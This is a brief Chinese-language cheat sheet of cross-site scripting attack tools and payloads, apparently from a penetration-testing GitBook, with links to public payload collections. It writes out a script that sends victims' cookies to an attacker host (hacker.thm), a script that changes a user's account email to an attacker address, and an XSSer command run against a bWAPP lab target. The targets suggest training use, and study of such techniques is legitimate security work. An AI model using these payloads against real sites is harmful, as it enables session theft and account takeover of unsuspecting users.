工具

BeFF XSS 渗透测试工具
端口扫描：迷你本地端口扫描器
burpsuite + xssvalidator
会话窃取

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

按键记录器
逻辑修改用户邮箱

<script>user.changeEmail('attacker@hacker.thm');</script>

Bind XSS: XssHunter 自动获取 COOKIE、URL、页面内容
XSSer

git clone https://github.com/epsylon/xsser.git
python3 xsser --url "http://192.168.0.9/bWAPP/xss_get.php?firstname=XSS&lastname=test1&form=submit" --cookie "PHPSESSID=q6t1k21lah0ois25m0b4egps85; security_level=1" --auto

综合工具

XSS-Payloads-com

Payload 列表

https://www.heresecurity.wiki/chu-shi-fang-wen/web-fu-wu-tu-po/xss

https://swisskyrepo.github.io/PayloadsAllTheThings/XSS%20Injection/#data-grabber-for-xss

https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting

GitBook

资源

工具

综合工具

Payload 列表